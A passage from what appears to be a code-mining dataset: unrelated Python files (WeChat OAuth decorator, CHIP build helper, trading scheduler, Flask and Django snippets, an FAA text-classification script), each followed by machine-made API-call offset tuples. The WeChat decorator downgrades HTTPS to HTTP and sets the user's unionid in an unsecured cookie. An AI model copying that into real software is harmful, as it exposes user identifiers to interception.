636), False, 'from django.contrib import auth\n'), ((1668, 1689), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (1687, 1689), False, 'from django.contrib import auth\n'), ((1998, 2019), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (2017, 2019), False, 'from django.contrib import auth\n'), ((2275, 2296), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (2294, 2296), False, 'from django.contrib import auth\n'), ((3048, 3069), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (3067, 3069), False, 'from django.contrib import auth\n'), ((3400, 3421), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (3419, 3421), False, 'from django.contrib import auth\n'), ((3780, 3801), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (3799, 3801), False, 'from django.contrib import auth\n'), ((5050, 5068), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (5066, 5068), False, 'from plok.models import Blog, Article\n'), ((5365, 5383), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (5381, 5383), False, 'from plok.models import Blog, Article\n'), ((6013, 6031), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (6029, 6031), False, 'from plok.models import Blog, Article\n'), ((6391, 6409), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (6407, 6409), False, 'from plok.models import Blog, Article\n'), ((7487, 7505), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (7503, 7505), False, 'from plok.models import Blog, Article\n'), ((7755, 7773), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (7771, 7773), False, 'from plok.models import Blog, Article\n'), ((8227, 8248), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (8246, 8248), False, 'from 
django.contrib import auth\n'), ((8999, 9020), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (9018, 9020), False, 'from django.contrib import auth\n'), ((10470, 10488), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (10486, 10488), False, 'from plok.models import Blog, Article\n'), ((10623, 10641), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (10639, 10641), False, 'from plok.models import Blog, Article\n'), ((10727, 10748), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (10746, 10748), False, 'from django.contrib import auth\n'), ((11195, 11216), 'django.contrib.auth.get_user_model', 'auth.get_user_model', ([], {}), '()\n', (11214, 11216), False, 'from django.contrib import auth\n'), ((11430, 11448), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (11446, 11448), False, 'from plok.models import Blog, Article\n'), ((11583, 11601), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (11599, 11601), False, 'from plok.models import Blog, Article\n'), ((12021, 12039), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (12037, 12039), False, 'from plok.models import Blog, Article\n'), ((12077, 12098), 'plok.models.Article.objects.all', 'Article.objects.all', ([], {}), '()\n', (12096, 12098), False, 'from plok.models import Blog, Article\n'), ((12233, 12251), 'plok.models.Blog.objects.all', 'Blog.objects.all', ([], {}), '()\n', (12249, 12251), False, 'from plok.models import Blog, Article\n'), ((12289, 12310), 'plok.models.Article.objects.all', 'Article.objects.all', ([], {}), '()\n', (12308, 12310), False, 'from plok.models import Blog, Article\n')] |
# -*- coding: utf-8 -*-
"""
Created on 2014-5-14
django 帮助函数
@author: skycrab
@sns_userinfo
def oauth(request):
openid = request.openid
"""
import json
import logging
import base64
from functools import wraps
from django.conf import settings
from django.core.cache import cache
from django.shortcuts import redirect, render_to_response
from django.contrib.auth import login, logout, authenticate
from rest_framework.authtoken.models import Token
from core.redis_number import RedisStat
from django.core.urlresolvers import reverse
from .common import CommonHelper
from wx import class_property, WeixinHelper
from datetime import timedelta
from django.utils import timezone
from shop.models import ShopInfo
from account.models import User
import urllib, urlparse
import time
logger = logging.getLogger('control')
class Helper(CommonHelper):
"""微信具体逻辑帮组类"""
@class_property
def cache(cls):
"""返回cache对象"""
return cache
@class_property
def secret_key(cls):
"""返回cookie加密秘钥"""
return settings.SECRET_KEY
def sns_userinfo_proxy_callback(callback=None):
"""
网页授权获取用户信息装饰器
callback(openid, userinfo):
return user
"""
def wrap(func):
@wraps(func)
def inner(request, *args, **kwargs):
if 'MicroMessenger' in request.META.get('HTTP_USER_AGENT', ''):
shop = request.GET.get('shop', None)
if not shop:
response = func(request, *args, **kwargs)
else:
# 判断支付情况
if request.is_secure():
url = request.build_absolute_uri().replace('https://', 'http://')
return redirect(url)
unionid = request.session.get('unionid', '')
timestamp_now = int(time.time())
ok, unionid = Helper.check_cookie(unionid)
redis = RedisStat()
if ok:
# 判断微信用户token是否存在,如果不存在,则需要授权
redis_info = redis.get(unionid)
if not redis_info:
ok = False
else:
ws = json.loads(redis_info)
if not ws['unionid']:
ok = False
if not ok:
# unionid出错,重新授权
state = request.GET.get('state', None)
if state:
# aa|bb|cc aa:最近一级上级推客 bb:谁转发过来 cc:时间戳
state_list = urllib.unquote(state).split('|')
if len(state_list) != 3:
state = '0|0|%d' % timestamp_now
else:
state = '0|0|%d' % timestamp_now
state += '|%s' % shop
rs_id = redis.get('redirect_url_id')
if rs_id:
url_id = redis.incr('redirect_url_id')
else:
url_id = 1
redis.set('redirect_url_id', url_id)
redis.set_ttl('redirect_url_id_%d' % url_id, request.build_absolute_uri(), 60)
# 跳转到代理微信认证服务器
redirect_url = 'http://%s.control.binli360.com%s' % (shop, reverse('open:proxy_callback'))
scope = 'snsapi_base'
state = 'base|%s|%s' % (state, url_id)
url = WeixinHelper.proxy(redirect_url, scope, state, 'mobile')
return redirect(url)
else:
# 获取绑定的User对象
user = authenticate(unionid=unionid)
if user:
# token, goc = Token.objects.get_or_create(user=user)
login(request, user)
response = func(request, *args, **kwargs)
# response.set_cookie(shop+'_key', token.key, path='/')
response.set_cookie(shop, unionid, path='/')
else:
response = func(request, *args, **kwargs)
else:
response = func(request, *args, **kwargs)
return response
return inner
return wrap
sns_userinfo = sns_userinfo_proxy_callback()
def sns_userinfo_proxy_test_callback(callback=None):
"""
网页授权获取用户信息装饰器
callback(openid, userinfo):
return user
"""
def wrap(func):
@wraps(func)
def inner(request, *args, **kwargs):
if 'MicroMessenger' in request.META.get('HTTP_USER_AGENT', ''):
# logger.debug('sns_userinfo_proxy_test_callback is wechat')
shop = request.GET.get('shop', None)
if not shop:
response = func(request, *args, **kwargs)
else:
# 判断支付情况
if request.is_secure():
url = request.build_absolute_uri().replace('https://', 'http://')
return redirect(url)
unionid = request.session.get('unionid', '')
timestamp_now = int(time.time())
ok, unionid = Helper.check_cookie(unionid)
# logger.debug('sns_userinfo_proxy_test_callback sessino unionid is : %s' % unionid)
redis = RedisStat()
if ok:
# 判断微信用户token是否存在,如果不存在,则需要授权
redis_info = redis.get(unionid)
if not redis_info:
ok = False
else:
ws = json.loads(redis_info)
if not ws['unionid']:
ok = False
if not ok:
# unionid出错,重新授权
state = request.GET.get('state', None)
if state:
# aa|bb|cc aa:最近一级上级推客 bb:谁转发过来 cc:时间戳
state_list = urllib.unquote(state).split('|')
if len(state_list) != 3:
state = '0|0|%d' % timestamp_now
else:
state = '0|0|%d' % timestamp_now
state += '|%s' % shop
rs_id = redis.get('redirect_url_id')
if rs_id:
url_id = redis.incr('redirect_url_id')
else:
url_id = 1
redis.set('redirect_url_id', url_id)
redis.set_ttl('redirect_url_id_%d' % url_id, request.build_absolute_uri(), 60)
# 跳转到代理微信认证服务器
redirect_url = 'http://%s.control.binli360.com%s' % (shop, reverse('open:proxy_callback_test'))
scope = 'snsapi_base'
state = 'base|%s|%s' % (state, url_id)
url = WeixinHelper.proxy(redirect_url, scope, state, 'mobile')
# logger.debug('sns_userinfo_proxy_test_callback redirect_url is %s' % url)
return redirect(url)
else:
# logger.debug('sns_userinfo_proxy_test_callback unionid is : %s' % unionid)
pass
# 获取绑定的User对象
user = authenticate(unionid=unionid)
if user:
# token, goc = Token.objects.get_or_create(user=user)
login(request, user)
response = func(request, *args, **kwargs)
# response.set_cookie(shop+'_key', token.key, path='/')
response.set_cookie(shop, unionid, path='/')
else:
response = func(request, *args, **kwargs)
else:
response = func(request, *args, **kwargs)
return response
return inner
return wrap
sns_userinfo_test = sns_userinfo_proxy_test_callback()
| [
"logging.getLogger",
"django.contrib.auth.authenticate",
"json.loads",
"core.redis_number.RedisStat",
"urllib.unquote",
"wx.WeixinHelper.proxy",
"django.contrib.auth.login",
"functools.wraps",
"django.core.urlresolvers.reverse",
"django.shortcuts.redirect",
"time.time"
] | [((825, 853), 'logging.getLogger', 'logging.getLogger', (['"""control"""'], {}), "('control')\n", (842, 853), False, 'import logging\n'), ((1287, 1298), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (1292, 1298), False, 'from functools import wraps\n'), ((4835, 4846), 'functools.wraps', 'wraps', (['func'], {}), '(func)\n', (4840, 4846), False, 'from functools import wraps\n'), ((2021, 2032), 'core.redis_number.RedisStat', 'RedisStat', ([], {}), '()\n', (2030, 2032), False, 'from core.redis_number import RedisStat\n'), ((5753, 5764), 'core.redis_number.RedisStat', 'RedisStat', ([], {}), '()\n', (5762, 5764), False, 'from core.redis_number import RedisStat\n'), ((1792, 1805), 'django.shortcuts.redirect', 'redirect', (['url'], {}), '(url)\n', (1800, 1805), False, 'from django.shortcuts import redirect, render_to_response\n'), ((1913, 1924), 'time.time', 'time.time', ([], {}), '()\n', (1922, 1924), False, 'import time\n'), ((3729, 3785), 'wx.WeixinHelper.proxy', 'WeixinHelper.proxy', (['redirect_url', 'scope', 'state', '"""mobile"""'], {}), "(redirect_url, scope, state, 'mobile')\n", (3747, 3785), False, 'from wx import class_property, WeixinHelper\n'), ((3818, 3831), 'django.shortcuts.redirect', 'redirect', (['url'], {}), '(url)\n', (3826, 3831), False, 'from django.shortcuts import redirect, render_to_response\n'), ((3932, 3961), 'django.contrib.auth.authenticate', 'authenticate', ([], {'unionid': 'unionid'}), '(unionid=unionid)\n', (3944, 3961), False, 'from django.contrib.auth import login, logout, authenticate\n'), ((5418, 5431), 'django.shortcuts.redirect', 'redirect', (['url'], {}), '(url)\n', (5426, 5431), False, 'from django.shortcuts import redirect, render_to_response\n'), ((5539, 5550), 'time.time', 'time.time', ([], {}), '()\n', (5548, 5550), False, 'import time\n'), ((7466, 7522), 'wx.WeixinHelper.proxy', 'WeixinHelper.proxy', (['redirect_url', 'scope', 'state', '"""mobile"""'], {}), "(redirect_url, scope, state, 'mobile')\n", (7484, 7522), 
False, 'from wx import class_property, WeixinHelper\n'), ((7656, 7669), 'django.shortcuts.redirect', 'redirect', (['url'], {}), '(url)\n', (7664, 7669), False, 'from django.shortcuts import redirect, render_to_response\n'), ((7900, 7929), 'django.contrib.auth.authenticate', 'authenticate', ([], {'unionid': 'unionid'}), '(unionid=unionid)\n', (7912, 7929), False, 'from django.contrib.auth import login, logout, authenticate\n'), ((2322, 2344), 'json.loads', 'json.loads', (['redis_info'], {}), '(redis_info)\n', (2332, 2344), False, 'import json\n'), ((4108, 4128), 'django.contrib.auth.login', 'login', (['request', 'user'], {}), '(request, user)\n', (4113, 4128), False, 'from django.contrib.auth import login, logout, authenticate\n'), ((6054, 6076), 'json.loads', 'json.loads', (['redis_info'], {}), '(redis_info)\n', (6064, 6076), False, 'import json\n'), ((8076, 8096), 'django.contrib.auth.login', 'login', (['request', 'user'], {}), '(request, user)\n', (8081, 8096), False, 'from django.contrib.auth import login, logout, authenticate\n'), ((3555, 3585), 'django.core.urlresolvers.reverse', 'reverse', (['"""open:proxy_callback"""'], {}), "('open:proxy_callback')\n", (3562, 3585), False, 'from django.core.urlresolvers import reverse\n'), ((7287, 7322), 'django.core.urlresolvers.reverse', 'reverse', (['"""open:proxy_callback_test"""'], {}), "('open:proxy_callback_test')\n", (7294, 7322), False, 'from django.core.urlresolvers import reverse\n'), ((2726, 2747), 'urllib.unquote', 'urllib.unquote', (['state'], {}), '(state)\n', (2740, 2747), False, 'import urllib, urlparse\n'), ((6458, 6479), 'urllib.unquote', 'urllib.unquote', (['state'], {}), '(state)\n', (6472, 6479), False, 'import urllib, urlparse\n')] |
# Copyright (c) 2021 Project CHIP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from enum import Enum, auto
from .gn import GnBuilder
class QpgApp(Enum):
LIGHT = auto()
LOCK = auto()
SHELL = auto()
PERSISTENT_STORAGE = auto()
def ExampleName(self):
if self == QpgApp.LIGHT:
return 'lighting-app'
elif self == QpgApp.LOCK:
return 'lock-app'
elif self == QpgApp.SHELL:
return 'shell'
elif self == QpgApp.PERSISTENT_STORAGE:
return 'persistent-storage'
else:
raise Exception('Unknown app type: %r' % self)
def AppNamePrefix(self):
if self == QpgApp.LIGHT:
return 'chip-qpg6105-lighting-example'
elif self == QpgApp.LOCK:
return 'chip-qpg6105-lock-example'
elif self == QpgApp.SHELL:
return 'chip-qpg6105-shell-example'
elif self == QpgApp.PERSISTENT_STORAGE:
return 'chip-qpg6105-persistent_storage-example'
else:
raise Exception('Unknown app type: %r' % self)
def FlashBundleName(self):
if self == QpgApp.LIGHT:
return 'lighting_app.out.flashbundle.txt'
elif self == QpgApp.LOCK:
return 'lock_app.out.flashbundle.txt'
elif self == QpgApp.SHELL:
return 'shell_app.out.flashbundle.txt'
elif self == QpgApp.PERSISTENT_STORAGE:
return 'persistent_storage_app.out.flashbundle.txt'
else:
raise Exception('Unknown app type: %r' % self)
def BuildRoot(self, root):
return os.path.join(root, 'examples', self.ExampleName(), 'qpg')
class QpgBoard(Enum):
QPG6105 = 1
def GnArgName(self):
if self == QpgBoard.QPG6105:
return 'qpg6105'
else:
raise Exception('Unknown board #: %r' % self)
class QpgBuilder(GnBuilder):
def __init__(self,
root,
runner,
app: QpgApp = QpgApp.LIGHT,
board: QpgBoard = QpgBoard.QPG6105,
enable_rpcs: bool = False):
super(QpgBuilder, self).__init__(
root=app.BuildRoot(root),
runner=runner)
self.app = app
self.board = board
self.enable_rpcs = enable_rpcs
def GnBuildArgs(self):
args = ['qpg_target_ic=\"%s\"' % self.board.GnArgName()]
if self.enable_rpcs:
args.append('import("//with_pw_rpc.gni")')
return args
def build_outputs(self):
items = {}
for extension in ["out", "out.map", "out.hex"]:
name = '%s.%s' % (self.app.AppNamePrefix(), extension)
items[name] = os.path.join(self.output_dir, name)
# Figure out flash bundle files and build accordingly
with open(os.path.join(self.output_dir, self.app.FlashBundleName())) as f:
for line in f.readlines():
name = line.strip()
items['flashbundle/%s' %
name] = os.path.join(self.output_dir, name)
return items
| [
"os.path.join",
"enum.auto"
] | [((684, 690), 'enum.auto', 'auto', ([], {}), '()\n', (688, 690), False, 'from enum import Enum, auto\n'), ((702, 708), 'enum.auto', 'auto', ([], {}), '()\n', (706, 708), False, 'from enum import Enum, auto\n'), ((721, 727), 'enum.auto', 'auto', ([], {}), '()\n', (725, 727), False, 'from enum import Enum, auto\n'), ((753, 759), 'enum.auto', 'auto', ([], {}), '()\n', (757, 759), False, 'from enum import Enum, auto\n'), ((3222, 3257), 'os.path.join', 'os.path.join', (['self.output_dir', 'name'], {}), '(self.output_dir, name)\n', (3234, 3257), False, 'import os\n'), ((3550, 3585), 'os.path.join', 'os.path.join', (['self.output_dir', 'name'], {}), '(self.output_dir, name)\n', (3562, 3585), False, 'import os\n')] |
# -*- coding: utf-8 -*-
##############################################################################
# Author:QQ173782910
##############################################################################
import logging
from apscheduler.schedulers.background import BlockingScheduler
from RunUse import TradeRun
format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=format, filename='log_print.txt')
logger = logging.getLogger('print')
logging.getLogger("apscheduler").setLevel(logging.WARNING) # 设置apscheduler.
if __name__ == '__main__':
RunTrade = TradeRun()
scheduler = BlockingScheduler() # 定时的任务.
scheduler.add_job(RunTrade.get_kline_data, trigger='cron', second='*/2') # 主计算k线
scheduler.add_job(RunTrade.get_open_orders, trigger='cron', second='*/2') # 未成交单
scheduler.add_job(RunTrade.get_position, trigger='cron', second='*/1') # 仓位
scheduler.start() | [
"logging.basicConfig",
"apscheduler.schedulers.background.BlockingScheduler",
"logging.getLogger",
"RunUse.TradeRun"
] | [((377, 462), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO', 'format': 'format', 'filename': '"""log_print.txt"""'}), "(level=logging.INFO, format=format, filename='log_print.txt'\n )\n", (396, 462), False, 'import logging\n'), ((467, 493), 'logging.getLogger', 'logging.getLogger', (['"""print"""'], {}), "('print')\n", (484, 493), False, 'import logging\n'), ((615, 625), 'RunUse.TradeRun', 'TradeRun', ([], {}), '()\n', (623, 625), False, 'from RunUse import TradeRun\n'), ((642, 661), 'apscheduler.schedulers.background.BlockingScheduler', 'BlockingScheduler', ([], {}), '()\n', (659, 661), False, 'from apscheduler.schedulers.background import BlockingScheduler\n'), ((494, 526), 'logging.getLogger', 'logging.getLogger', (['"""apscheduler"""'], {}), "('apscheduler')\n", (511, 526), False, 'import logging\n')] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('wiki_images', '0001_initial'),
]
operations = [
migrations.AlterModelTable(
name='image',
table='wiki_images_image',
),
migrations.AlterModelTable(
name='imagerevision',
table='wiki_images_imagerevision',
),
]
| [
"django.db.migrations.AlterModelTable"
] | [((244, 311), 'django.db.migrations.AlterModelTable', 'migrations.AlterModelTable', ([], {'name': '"""image"""', 'table': '"""wiki_images_image"""'}), "(name='image', table='wiki_images_image')\n", (270, 311), False, 'from django.db import migrations, models\n'), ((356, 444), 'django.db.migrations.AlterModelTable', 'migrations.AlterModelTable', ([], {'name': '"""imagerevision"""', 'table': '"""wiki_images_imagerevision"""'}), "(name='imagerevision', table=\n 'wiki_images_imagerevision')\n", (382, 444), False, 'from django.db import migrations, models\n')] |
# coding: utf-8
from modules.controller import Controller
LED_PIN = 23 # pin of led
if __name__ == "__main__":
controller = Controller(LED_PIN)
controller.run(50, 1)
print("Led Start for a second with 50% power")
| [
"modules.controller.Controller"
] | [((132, 151), 'modules.controller.Controller', 'Controller', (['LED_PIN'], {}), '(LED_PIN)\n', (142, 151), False, 'from modules.controller import Controller\n')] |
from .base import BaseFactory
from launchkey import LAUNCHKEY_PRODUCTION
from launchkey.clients import ServiceClient
class ServiceFactory(BaseFactory):
"""Factory for creating clients when representing a LaunchKey Service Profile"""
def __init__(self, service_id, private_key, url=LAUNCHKEY_PRODUCTION, testing=False, transport=None):
"""
:param service_id: UUID for the requesting service
:param private_key: PEM formatted private key string
:param url: URL for the LaunchKey API
:param testing: Boolean stating whether testing mode is being used. This will determine whether SSL validation
occurs.
:param: transport: Instantiated transport object. The default and currently only supported transport is
launchkey.transports.JOSETransport. If you wish to set encryption or hashing algorithms, this is where you would
do it. IE: JOSETransport(jwt_algorithm="RS512", jwe_cek_encryption="RSA-OAEP",
jwe_claims_encryption="A256CBC-HS512", content_hash_algorithm="S256")
"""
super(ServiceFactory, self).__init__('svc', service_id, private_key, url, testing, transport)
def make_service_client(self):
"""
Retrieves a client to make service calls.
:return: launchkey.clients.ServiceClient
"""
return ServiceClient(self._issuer_id, self._transport)
| [
"launchkey.clients.ServiceClient"
] | [((1369, 1416), 'launchkey.clients.ServiceClient', 'ServiceClient', (['self._issuer_id', 'self._transport'], {}), '(self._issuer_id, self._transport)\n', (1382, 1416), False, 'from launchkey.clients import ServiceClient\n')] |
""" User api endpoints """
from flask import request
from flask_restplus import Resource
from ..util.dto import UserDto
from ..service.user import save_new_user
api = UserDto.api
_user = UserDto.user
@api.route('/users')
class Users(Resource):
"""
User resource for the API
"""
@api.doc('Create a new user')
@api.expect(_user, validate=True)
@api.response(201, 'Successfully registered user')
def post(self):
""" Create new user post method """
data = request.get_json()
return save_new_user(data=data)
| [
"flask.request.get_json"
] | [((502, 520), 'flask.request.get_json', 'request.get_json', ([], {}), '()\n', (518, 520), False, 'from flask import request\n')] |
import os
import zipfile
from typing import List, Tuple, Dict
import numpy as np
import pandas as pd
import requests
import structlog
import matplotlib.pyplot as plt
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.neighbors import KNeighborsClassifier
from tensorflow import keras, one_hot
from tensorflow.keras import layers
from tensorflow.keras.callbacks import CSVLogger
from tensorflow.keras.layers import ReLU
plt.rcParams.update({'figure.figsize': (16.0, 12.0)})
_LOGGER = structlog.get_logger(__file__)
HEADER_COLUMN = 12
LABEL_COLUMN = 'False Warning'
TEXT_COLUMN = 'Text'
def download_file(url: str, local_dir: str = '.', local_filename: str = '') -> str:
"""
Downloads a file from a provided url to a local directory
:param url: URL to download the file from
:param local_dir: Local directory to download the file to (created if it does not exist)
:param local_filename: What to name the file when saved
(if empty or none, assume the name of the original name of the file)
:return: the name of the file which was saved
"""
os.makedirs(f'{local_dir}', exist_ok=True)
local_filename = local_filename if local_filename else url.split('/')[-1]
if os.path.exists(f'{local_dir}/{local_filename}'):
_LOGGER.info(f'{local_dir}/{local_filename} already exists. Skipping download.')
else:
_LOGGER.info(f"Downloading file from {url} to {local_dir}/{local_filename}.")
with requests.get(url, stream=True) as r:
r.raise_for_status()
with open(f'./{local_dir}/{local_filename}', 'wb') as f:
for chunk in r.iter_content(chunk_size=128):
f.write(chunk)
_LOGGER.info(f"Finished saving file from {url} to {local_dir}/{local_filename}.")
return f'{local_dir}/{local_filename}'
def unzip_file(path_to_zip_file: str, dir_to_extract_to: str) -> str:
"""
Unzips a zip file to a provided directory
:param path_to_file: path to zip file
:param dir_to_extract_to: directory to extract zip file
:return: full path to unzipped file (assuming there is only one)
"""
with zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:
zip_ref.extractall(dir_to_extract_to)
return f'{dir_to_extract_to}/{zip_ref.namelist()[0]}'
def load_data(path_to_file: str) -> pd.DataFrame:
"""
Loads excel data from a supplied path into a Pandas dataframe
:param path_to_file: path to excel file
:return: Pandas dataframe containing contents of excel spreadsheet
"""
_LOGGER.info(f"Started loading the excel data from {path_to_file} into a dataframe - this may take a while. "
f"You may want to grab a coffee.")
df = pd.read_excel(path_to_file, engine='openpyxl', header=HEADER_COLUMN)
_LOGGER.info(f"Finished loading the excel data from {path_to_file} into a dataframe.")
return df
def vectorize(df: pd.DataFrame, **kwargs) -> Tuple[np.array, List[str]]:
_LOGGER.info("Converting text to feature matrix")
vectorizer = TfidfVectorizer(**kwargs)
sparse_matrix = vectorizer.fit_transform(df[TEXT_COLUMN])
feature_matrix = sparse_matrix.todense()
return feature_matrix, vectorizer.get_feature_names()
def extract_and_encode_labels(df: pd.DataFrame) -> Tuple[np.array, Dict[str, int]]:
label_mapping = dict((label, i) for i, label in enumerate(df[LABEL_COLUMN].unique()))
labels = list(df[LABEL_COLUMN].map(label_mapping))
return np.array(labels), label_mapping
if __name__ == "__main__":
local_dir = './data'
compute_features = not os.path.exists(f'{local_dir}/feature_data.csv')
model_type = "knn"
if compute_features:
# download the file
path_to_downloaded_zip_file = download_file(
'https://www.fire.tc.faa.gov/zip/MasterModelVersion3DDeliverable.zip',
local_dir)
# unzip the file
path_to_file = unzip_file(path_to_downloaded_zip_file, local_dir)
# load the file into a Pandas dataframe
df = load_data(path_to_file)
# save preprocessed data to save time for future runs
df.to_csv(f'{local_dir}/feature_data.csv')
else:
# don't go through the hassle of preprocessing if we already have the preprocessed data saved
df = pd.read_csv(f'{local_dir}/feature_data.csv')
count_of_no_text = len(df[df[TEXT_COLUMN].isnull()])
df = df.dropna(subset=[TEXT_COLUMN])
_LOGGER.info(f"Dropped {count_of_no_text} records because {TEXT_COLUMN} was null or NaN")
count_of_null_labels = len(df[df[LABEL_COLUMN].isnull()])
df = df.dropna(subset=[LABEL_COLUMN])
_LOGGER.info(f"Dropped {count_of_null_labels} records because {LABEL_COLUMN} was null or NaN")
# create a sparse feature matrix of size n x m,
# where n = number of documents, m = number of words in vocabulary
feature_matrix, feature_names = vectorize(df, min_df=0.001)
labels, label_mapping = extract_and_encode_labels(df)
num_labels = len(label_mapping)
num_features = feature_matrix.shape[1]
X_train, X_test, y_train, y_test = train_test_split(feature_matrix, labels, test_size=0.05, random_state=1)
_LOGGER.info(f"Training on {X_train.shape[0]} samples, validating on {X_test.shape[0]} samples.")
_LOGGER.info(f"Number of features: {num_features}")
if model_type == "mlp":
labels = one_hot(np.array(labels), len(label_mapping))
inputs = keras.Input(shape=(num_features,))
layer_1 = layers.Dense(8192, activation=ReLU())(inputs)
layer_2 = layers.Dense(2048, activation=ReLU())(layer_1)
layer_3 = layers.Dense(512, activation=ReLU())(layer_2)
layer_4 = layers.Dense(128, activation=ReLU())(layer_3)
layer_5 = layers.Dense(32, activation=ReLU())(layer_4)
layer_6 = layers.Dense(8, activation=ReLU())(layer_5)
outputs = layers.Dense(num_labels, activation="softmax")(layer_6)
model = keras.Model(inputs=inputs, outputs=outputs)
_LOGGER.info(model.summary())
model.compile(
optimizer=keras.optimizers.Adamax(), # Optimizer
loss=keras.losses.CategoricalCrossentropy(), # Loss function to minimize
metrics=[keras.metrics.Accuracy()] # List of metrics to monitor
)
model.fit(X_train, y_train,
validation_data=(X_test, y_test), shuffle=True, epochs=200, batch_size=64,
callbacks=[CSVLogger('./results.csv')])
model.save('model')
elif model_type == "rf":
rf = RandomForestClassifier(n_jobs=-1)
rf.fit(X_train, y_train)
training_acc = rf.score(X_train, y_train)
validation_acc = rf.score(X_test, y_test)
_LOGGER.info(f"Training accuracy with Random Forest: {training_acc}")
_LOGGER.info(f"Validation accuracy with Random Forest: {validation_acc}")
elif model_type == "knn":
knn = KNeighborsClassifier(n_neighbors=5, n_jobs=-1)
knn.fit(X_train, y_train)
training_acc = knn.score(X_train, y_train)
validation_acc = knn.score(X_test, y_test)
_LOGGER.info(f"Training accuracy with kNN: {training_acc}")
_LOGGER.info(f"Validation accuracy with kNN: {validation_acc}") | [
"zipfile.ZipFile",
"pandas.read_csv",
"sklearn.neighbors.KNeighborsClassifier",
"numpy.array",
"tensorflow.keras.layers.Dense",
"pandas.read_excel",
"tensorflow.keras.losses.CategoricalCrossentropy",
"os.path.exists",
"sklearn.model_selection.train_test_split",
"tensorflow.keras.layers.ReLU",
"s... | [((548, 601), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'figure.figsize': (16.0, 12.0)}"], {}), "({'figure.figsize': (16.0, 12.0)})\n", (567, 601), True, 'import matplotlib.pyplot as plt\n'), ((612, 642), 'structlog.get_logger', 'structlog.get_logger', (['__file__'], {}), '(__file__)\n', (632, 642), False, 'import structlog\n'), ((1205, 1247), 'os.makedirs', 'os.makedirs', (['f"""{local_dir}"""'], {'exist_ok': '(True)'}), "(f'{local_dir}', exist_ok=True)\n", (1216, 1247), False, 'import os\n'), ((1333, 1380), 'os.path.exists', 'os.path.exists', (['f"""{local_dir}/{local_filename}"""'], {}), "(f'{local_dir}/{local_filename}')\n", (1347, 1380), False, 'import os\n'), ((2845, 2913), 'pandas.read_excel', 'pd.read_excel', (['path_to_file'], {'engine': '"""openpyxl"""', 'header': 'HEADER_COLUMN'}), "(path_to_file, engine='openpyxl', header=HEADER_COLUMN)\n", (2858, 2913), True, 'import pandas as pd\n'), ((3165, 3190), 'sklearn.feature_extraction.text.TfidfVectorizer', 'TfidfVectorizer', ([], {}), '(**kwargs)\n', (3180, 3190), False, 'from sklearn.feature_extraction.text import TfidfVectorizer\n'), ((5228, 5300), 'sklearn.model_selection.train_test_split', 'train_test_split', (['feature_matrix', 'labels'], {'test_size': '(0.05)', 'random_state': '(1)'}), '(feature_matrix, labels, test_size=0.05, random_state=1)\n', (5244, 5300), False, 'from sklearn.model_selection import train_test_split\n'), ((2262, 2300), 'zipfile.ZipFile', 'zipfile.ZipFile', (['path_to_zip_file', '"""r"""'], {}), "(path_to_zip_file, 'r')\n", (2277, 2300), False, 'import zipfile\n'), ((3598, 3614), 'numpy.array', 'np.array', (['labels'], {}), '(labels)\n', (3606, 3614), True, 'import numpy as np\n'), ((3712, 3759), 'os.path.exists', 'os.path.exists', (['f"""{local_dir}/feature_data.csv"""'], {}), "(f'{local_dir}/feature_data.csv')\n", (3726, 3759), False, 'import os\n'), ((4420, 4464), 'pandas.read_csv', 'pd.read_csv', (['f"""{local_dir}/feature_data.csv"""'], {}), 
